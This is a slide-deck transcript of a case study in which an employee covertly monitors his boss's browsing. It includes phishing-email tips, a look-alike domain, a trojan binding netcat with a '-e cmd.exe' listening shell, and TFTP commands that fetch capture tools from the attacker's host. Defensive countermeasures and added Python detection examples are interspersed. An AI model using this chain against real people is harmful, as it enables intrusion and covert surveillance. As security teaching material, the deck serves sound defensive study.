Published by Kristin Butler. Modified over 8 years ago.
Slide 1
What’s the Boss viewing?
Slide 2
The Boss established a new policy against surfing the web during work hours
Phoenix decides to examine the sites that the Boss is looking at by spying on him
Slide 3
The networked machines are connected via a switch
◦ Private 192.168.1.0 network
◦ Boss’ IP: 192.168.1.5
◦ Phoenix’s IP: 192.168.1.6
Slide 4
Monitor traffic to and from the Boss’ machine
How “loud” should this approach be?
◦ Loud/noisy means that it could trigger alarms on IDS/IPS systems
◦ There might be reasons to launch a noisy attack
   ◦ Provide a distraction from another attack
   ◦ Sometimes it’s the only way to monitor traffic
Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
Slide 5
“Loud” methods
◦ Gratuitous ARP for individual hosts (ARP poisoning)
◦ MAC spoofing
◦ MAC flooding
◦ SPAN port mirroring
Slide 6
Gratuitous ARP
◦ Unsolicited ARP: the protocol allows for it, without checking for a matching ARP request (stateless!)
◦ An ARP reply is sent out associating the target’s IP with the collector’s MAC address
Spoof the MAC of the gateway
◦ Collector replies to ARP requests for the gateway’s MAC
◦ Switch will see the router’s MAC address on both switch ports and will send outbound traffic to both ports
MAC flooding
◦ Overwhelm the switch’s MAC table
◦ Causes the switch to “fail over” into hub mode
◦ MACOF (http://monkey.org/~dugsong/dsniff/)
Slide 7
Capture the traffic on the target host itself
◦ Plant WinPcap and a Trojan horse on the host
The trick will be to install the software on the target host
◦ The Boss will not blindly install software
◦ Have to convince him it’s something of value to him
The plan consists of a chained series of exploits
Slide 8
Copy a web site and host it on Phoenix’s server
Bind Netcat to a legitimate executable file
Send email to the Boss
◦ Download the free executable
◦ Netcat will also be downloaded and installed
Connect to the Boss’ machine using Netcat
Use TFTP to download a WinDump program onto the Boss’ machine
Capture the Boss’ network traffic
Analyze captured traffic
Rebuild a jpg image using a hex editor
Slide 9
Phoenix locates a site and plans to get his boss to visit a copied version of the site
◦ Lays the groundwork via some social engineering
◦ Tells the boss of a site, “certificatepractice.com”, which offers a free CCNA practice exam as a promotional offer
◦ Uses a utility to download and mirror the site
   ◦ Wget (www.gnu.org/software/wget)
   ◦ Copies the site recursively to the hard drive, following an appropriate depth of hyperlinks from the first page
   ◦ Will also copy the practice test executable
◦ Phoenix will bind his Trojan to this executable
Slide 10
A Trojan wrapper program is used
◦ YAB (Yet Another Binder)
   ◦ Areyoufearless.com (no longer there; however, it can be obtained via BitTorrent sites)
   ◦ Altavista.net
   ◦ Packetstormsecurity.org
◦ Add Bind File option
   ◦ Allows Phoenix to bind nc.exe
   ◦ Will execute nc (asynchronously is possible)
   ◦ Can add execution parameters when nc starts up: -p 50 -e cmd.exe -L
◦ Registry startup option available (default is no)
◦ Melt stub option
   ◦ Will remove Netcat after execution
◦ An icon can be added to make the install appear legitimate
Slide 11
Overwrite the original ccna.exe file with the bound Trojan file in the phony site
Register a very similar domain name
◦ “certification-practice.com”
Send an email to the victim
◦ Phoenix uses an anonymous e-mailer and spoofs the email header so that the “From:” appears to be the real site
   ◦ www.mail.com
   ◦ Doesn’t require a “real” email address to register
◦ The victim would have to read the email message headers in order to see the real source domain
Slide 12
Check for spelling and grammatical errors
Offer something free or on a trial basis
Appeal to greed
◦ Why the victim is getting something for nothing
◦ Lowers suspicion
Appeal to the victim’s sense of self
◦ Self-help tools, adding to success, etc.
Brevity
The text of the email contains the link to the site
◦ Appears as the URL of the real site, but the hyperlink really points to the phony site
Present the email to the victim
◦ Possibly prepare the victim for the email, adding to the enticement
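The last slide’s trick, link text that shows the real URL while the href points at the look-alike domain, is exactly what a mail filter can check for. The following is an added example, not part of the presentation: it scans the anchors of an HTML body, flags display-URL/href domain mismatches, and flags href domains that closely resemble a trusted domain. The email HTML, the 0.8 similarity threshold and the trusted-domain list are assumptions; only the two domain names come from the slides.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Constructed sample email body (made up for this example): the visible link
# text shows the real site, but the href points at the registered look-alike.
SAMPLE_HTML = """
<p>Free CCNA practice exam, this week only:</p>
<a href="http://certification-practice.com/ccna.exe">http://certificatepractice.com/ccna.exe</a>
<p>Questions? <a href="http://certificatepractice.com/help">Help</a></p>
"""

ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)

def registrable_domain(url: str) -> str:
    """Lower-cased hostname with a leading 'www.' stripped; '' if not a URL."""
    host = urlparse(url.strip()).hostname or ""
    return host[4:] if host.startswith("www.") else host

def check_links(html: str, trusted_domains):
    """Return [(href, [reasons])] for every anchor that deserves attention.

    Two indicators are checked: the visible link text is itself a URL whose
    domain differs from the href's domain, and the href domain is not trusted
    but looks very similar to a trusted one (typosquat / inserted hyphen).
    """
    findings = []
    for href, text in ANCHOR_RE.findall(html):
        href_dom = registrable_domain(href)
        plain = re.sub(r"<[^>]+>", "", text)
        text_dom = registrable_domain(plain) if "://" in plain else ""
        reasons = []
        if text_dom and text_dom != href_dom:
            reasons.append(f"display URL {text_dom} != href domain {href_dom}")
        if href_dom not in trusted_domains:
            for good in trusted_domains:
                ratio = SequenceMatcher(None, href_dom, good).ratio()
                if ratio >= 0.8:  # threshold is an assumption; tune per environment
                    reasons.append(f"look-alike of {good} (similarity {ratio:.2f})")
        if reasons:
            findings.append((href, reasons))
    return findings

if __name__ == "__main__":
    for href, reasons in check_links(SAMPLE_HTML, {"certificatepractice.com"}):
        print(href, "->", "; ".join(reasons))
```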
Slide 13
Angry IP Scanner
◦ www.angryziber.com/ipscan/
◦ Scan IPs on the network for the IP with port 50 open and listening
Slide 14
nc to the victim’s machine on port 50
Verify the connection using ipconfig
◦ Will show the victim machine’s IP in the nc window
Slide 15
Use command line utilities
◦ nc does not allow for usage of a GUI (Windows) interface
Sysinternals has a TFTP server available
◦ Free
◦ No configuration required
◦ Windows already has a TFTP client!
WinDump is downloaded
◦ www.winpcap.org/windump
◦ Placed into the default TFTP server directory (TFTP-Root)
Phoenix sets up a TFTP server on his machine
Using Netcat, Phoenix types: tftp –i 192.168.1.6 get windump.exe windump.exe
◦ Syntax: tftp [-i] host [put | get] source destination
◦ -i switch: use binary transfer
Slide 16
Options
◦ -c count (number of packets)
◦ -s snaplength (length of packets captured)
◦ -w filename (of captured packets)
windump –c 500 –s 1500 –w capture.log
If the victim does not have WinPcap installed, Phoenix must transfer and manually install WinPcap on the victim machine
◦ WinDump requires WinPcap
Slide 17
Phoenix downloads WinPcap
Unzips it
TFTP (to the victim’s winpcap directory)
◦ Daemon_mgm.exe
◦ NetMonInstaller.exe
◦ Npf_mgm.exe
◦ Rpcapd.exe
◦ Uninstall.exe
Execute
◦ Npf_mgm.exe –r
◦ Daemon_mgm.exe –r
◦ NetMonInstaller.exe i
Slide 18
Using Netcat: tftp –i 192.168.1.6 put capture.log
Use a packet analyzer to view the traffic
◦ Wireshark
A review shows sites visited by the victim
◦ Includes a GET (HTTP) for a file called “gambling.jpg”
Follow TCP stream
◦ Capture the output as raw data
◦ Use a hex editor (WinHex), if required, to edit the raw data
   ◦ Remove everything before the actual binary file (HTTP headers, etc.)
   ◦ Leaves just the actual binary of the image
   ◦ A jpg starts with ÿØÿà (bytes FF D8 FF E0)
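The hex-editor step above (strip the HTTP response headers, keep everything from ÿØÿà onward) is routine network forensics and is easy to script. The following is an added example, not from the presentation: it carves the image out of a raw HTTP response, honouring Content-Length when present and otherwise falling back to the JPEG start/end markers. It generalises slightly beyond the slide by matching any FF D8 FF start marker, so Exif (FF D8 FF E1) images are found too. The response bytes and the tiny stand-in image are constructed; the output file name is our choice.

```python
# JPEG start-of-image marker; JFIF files continue with E0 (the slide's "ÿØÿà"),
# Exif files with E1, so we match only the first three bytes.
JPEG_SOI = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"   # end-of-image marker

# Constructed stand-in for gambling.jpg: a JFIF header, padding, and EOI.
FAKE_BODY = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 20 + JPEG_EOI
# Constructed raw TCP stream as "Follow TCP stream" would show the server side.
RAW_STREAM = (
    b"HTTP/1.1 200 OK\r\n"
    + b"Content-Type: image/jpeg\r\n"
    + b"Content-Length: " + str(len(FAKE_BODY)).encode() + b"\r\n"
    + b"\r\n"
    + FAKE_BODY
)

def split_http_response(raw: bytes):
    """Return (headers as a lower-cased dict, body). Headers end at the blank line."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of HTTP headers found")
    headers = {}
    for line in head.split(b"\r\n")[1:]:        # skip the status line
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode()
    return headers, body

def carve_jpeg(raw: bytes) -> bytes:
    """Strip the HTTP headers and return just the image bytes.

    Content-Length bounds the body when it is present and plausible; otherwise
    (chunked transfer, truncated capture) we fall back to scanning for the
    first SOI and the last EOI marker, which is what the hex-editor step does.
    """
    headers, body = split_http_response(raw)
    length = headers.get("content-length", "")
    image = body[: int(length)] if length.isdigit() and int(length) <= len(body) else body
    start = image.find(JPEG_SOI)
    end = image.rfind(JPEG_EOI)
    if start < 0 or end < start:
        raise ValueError("no complete JPEG in this stream")
    return image[start : end + len(JPEG_EOI)]

if __name__ == "__main__":
    img = carve_jpeg(RAW_STREAM)
    with open("carved.jpg", "wb") as fh:        # file name is our choice
        fh.write(img)
    print(f"carved {len(img)} bytes, starts with {img[:4].hex()}")
```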
Slide 20
An anonymous note is left on the victim’s desk highlighting the activity
The Internet usage policy is relaxed the next day
Slide 21
Phishing
◦ Training!
◦ Spam filters / phishing filters
Trojan horse
◦ Anti-virus software with the latest signatures
   ◦ However, organizations will alter the Trojan (for a price) so that it does not match a signature
   ◦ EliteC0ders (no longer offers this “service”)
◦ Software policy
Sniffing
◦ Port security on switches
   ◦ Protects against ARP poisoning, MAC spoofing and MAC flooding
◦ IPS
◦ PromiScan
◦ Host-based IDS
   ◦ Cisco Secure Agent
   ◦ Warns if a new application is launching
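The three “loud” methods from slide 6 (gratuitous ARP, gateway MAC spoofing, MAC flooding) are the ones port security is meant to stop, and each leaves a signature an IDS can look for in the ARP traffic. The following is an added example, not from the presentation, showing that detection over a list of ARP records: an IP whose MAC binding changes, one MAC claiming several IPs, and too many distinct source MACs on one switch port in a short window. The records, MAC addresses, port names, thresholds and the 10.0.0.0/16 flood addresses are all constructed; only the 192.168.1.x addresses come from the slides.

```python
from collections import defaultdict

# Constructed ARP records: (seconds, switch_port, sender_mac, sender_ip, op),
# op is "request" or "reply". Ports and MACs are made up for this example.
SAMPLE_ARP = [
    (0.0, "Gi0/1", "00:11:22:aa:bb:01", "192.168.1.1", "reply"),    # real gateway
    (1.0, "Gi0/5", "00:11:22:aa:bb:05", "192.168.1.5", "request"),  # Boss asks for gateway
    (1.1, "Gi0/6", "00:11:22:aa:bb:06", "192.168.1.6", "reply"),    # host .6 announces itself
    (2.0, "Gi0/6", "00:11:22:aa:bb:06", "192.168.1.1", "reply"),    # gateway IP claimed by .6's MAC
] + [
    # macof-style burst: 300 random-looking MACs/IPs from one port in 3 seconds
    (3.0 + i * 0.01, "Gi0/6", f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}",
     f"10.0.{i >> 8}.{i & 0xff}", "reply")
    for i in range(300)
]

def detect_arp_anomalies(records, flood_threshold=100, window=5.0):
    """Return alert strings, one per anomaly, in the order they are observed.

    ip_changed : an IP already bound to one MAC is claimed by another
                 (gratuitous-ARP poisoning / gateway MAC spoofing)
    mac_multi  : one MAC claims a second IP (a poisoner answering for others)
    flood      : more than flood_threshold distinct source MACs on a single
                 switch port within `window` seconds (MAC table flooding)
    """
    alerts = []
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    port_macs = defaultdict(list)   # port -> [(time, mac)] within the window
    flooded_ports = set()
    for t, port, mac, ip, op in records:
        if op == "reply":
            old = ip_to_mac.get(ip)
            if old and old != mac:
                alerts.append(f"ip_changed {ip}: {old} -> {mac} (port {port})")
            ip_to_mac[ip] = mac
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) == 2:
                alerts.append(f"mac_multi {mac} claims {sorted(mac_to_ips[mac])}")
        # keep only records inside the sliding window, then count distinct MACs
        port_macs[port] = [(ts, m) for ts, m in port_macs[port] if t - ts <= window]
        port_macs[port].append((t, mac))
        if port not in flooded_ports and len({m for _, m in port_macs[port]}) > flood_threshold:
            flooded_ports.add(port)
            alerts.append(f"flood port {port}: >{flood_threshold} MACs in {window}s")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_ARP):
        print(alert)
```

A real deployment would feed this from a SPAN port or the switch’s own ARP inspection logs and whitelist the gateway binding so that a change to it is always an alert regardless of order.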